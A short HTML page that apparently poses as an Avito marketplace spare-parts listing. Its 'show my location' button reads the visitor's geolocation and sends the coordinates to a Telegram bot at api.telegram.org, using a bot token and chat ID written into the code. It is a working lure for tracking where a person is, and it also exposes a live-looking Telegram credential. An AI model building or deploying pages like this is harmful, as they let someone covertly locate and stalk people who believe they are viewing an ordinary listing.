<!DOCTYPE html>
<html>
  <head>
    <title>Авито запчасть</title>
    <meta charset="UTF-8" />
  </head>
  <body>
    <h1>Показать моё местоположение</h1>
    <button onclick="getLocation()">📍 Показать</button>

    <script>
      function getLocation() {
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(sendToTelegram);
        } else {
          alert("Геолокация не поддерживается.");
        }
      }

      function sendToTelegram(position) {
        const lat = position.coords.latitude;
        const lon = position.coords.longitude;

        const message = `🛰 Координаты:\nШирота: ${lat}\nДолгота: ${lon}`;
        const botToken = "7091173298:AAEwXyHlZkscayetEQf_2Btp-Odu2Xd09vk";
        const chatId = "7307380020"; // твой Telegram ID

        const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

        fetch(url)
          .then(response => {
            if (response.ok) {
              alert("Координаты отправлены!");
            } else {
              alert("Ошибка при отправке.");
            }
          })
          .catch(error => {
            alert("Ошибка соединения.");
          });
      }
    </script>
  </body>
</html>
